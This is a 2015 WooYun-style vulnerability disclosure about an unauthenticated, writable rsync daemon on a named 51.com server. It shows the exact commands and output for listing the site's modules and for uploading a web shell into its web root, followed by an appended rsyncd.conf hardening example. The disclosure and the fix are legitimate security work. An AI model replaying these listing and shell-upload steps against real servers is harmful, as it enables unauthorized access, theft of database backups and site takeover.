
Getshell on a 51.com site

2015-02-27 00:20

Unauthenticated rsync access: the server, which hosts several bound domains, can be compromised, and /opt/dbbackup/ contains database backups.

Code:
[root@localhost ~]# rsync 101.251.197.211::
sds sds.51.com
[root@localhost ~]# rsync 101.251.197.211::sds
drwxr-xr-x 4096 2015/01/05 21:56:55 .
drwxr-xr-x 4096 2014/01/10 11:29:59 admin.sds.51.com
drwxr-xr-x 4096 2014/01/09 00:44:45 api.sds.51.com
drwxr-xr-x 4096 2015/01/04 18:12:44 channel
drwxr-xr-x 4096 2014/04/06 23:57:03 core.sds
drwxr-xr-x 4096 2014/03/24 21:20:56 gm.sds.51.com
drwxr-xr-x 4096 2014/01/18 18:11:03 gw.sds.51.com
drwxr-xr-x 4096 2014/01/09 00:44:45 s.sds.51.com
drwxr-xr-x 4096 2014/03/21 14:03:23 sds.51.com
[root@localhost ~]# rsync 101.251.197.211::sds/api.sds.51.com
drwxr-xr-x 4096 2014/01/09 00:44:45 api.sds.51.com
[root@localhost ~]# rsync 101.251.197.211::sds/api.sds.51.com/
drwxr-xr-x 4096 2014/01/09 00:44:45 .
drwxr-xr-x 4096 2014/07/15 13:17:15 config
drwxr-xr-x 4096 2014/12/22 15:02:16 control
drwxr-xr-x 4096 2014/12/19 16:11:49 helper
drwxr-xr-x 4096 2014/10/16 11:43:11 model
drwxr-xr-x 4096 2015/01/12 22:10:26 wwwroot

Proof of vulnerability:

Uploading a shell

http://api.sds.51.com/help1.php

Code:
[root@localhost ~]# rsync -avz help1.php 101.251.197.211::sds/api.sds.51.com/wwwroot/
sending incremental file list
help1.php

sent 102 bytes received 27 bytes 86.00 bytes/sec
total size is 32 speedup is 0.25



[screenshot: shell.jpg]

Remediation:

Access control
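The fix, worked through as an added example that is not part of the original report: an rsyncd.conf module in the state the listing and the upload imply (inferred from the observed behaviour, since the page does not show the real configuration), followed by a hardened version. The path /srv/sds, the address 10.0.0.5, the network 10.0.0.0/8, the account name backup and the secrets file location are assumed placeholders.

```ini
# rsyncd.conf -- added example; the real configuration of the server in the report is not on the page.
# Comments are kept on their own lines throughout.

# --- WEAK: the module state implied by the listing and the upload ----------
# [sds]
# path = /srv/sds
# comment = sds.51.com
# read only = no
# No "hosts allow" and no "auth users": anyone who can reach tcp/873 may list the
# module ("rsync host::") and, because of "read only = no", push a file such as
# help1.php into it. (/srv/sds is an assumed path; the page never shows the real one.)

# --- HARDENED --------------------------------------------------------------
# Global defaults: bind only the internal interface (assumed address), confine the
# daemon to the module path, drop privileges, and refuse a readable secrets file.
address = 10.0.0.5
use chroot = yes
uid = nobody
gid = nobody
strict modes = yes

[sds]
path = /srv/sds
comment = sds.51.com
# Do not advertise the module in "rsync host::" output.
list = no
# Nobody may write into the web root over rsync; pulls only.
read only = yes
# Only the assumed backup network may connect; with "hosts allow" set and no
# "hosts deny", every other client is refused with "@ERROR: access denied".
hosts allow = 10.0.0.0/8
# Require a daemon account (assumed name); its password lives in the secrets file,
# one "user:password" per line, owned by root with mode 0600.
auth users = backup
secrets file = /etc/rsyncd.secrets
```

After the daemon is reloaded, repeating the first two commands of the report from a client outside 10.0.0.0/8 yields no module list and a refused connection. Even an allowed, authenticated client cannot reproduce the upload, because the module is read-only.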


Source: www.wooyun.org/bugs/wooyun-2015-091510
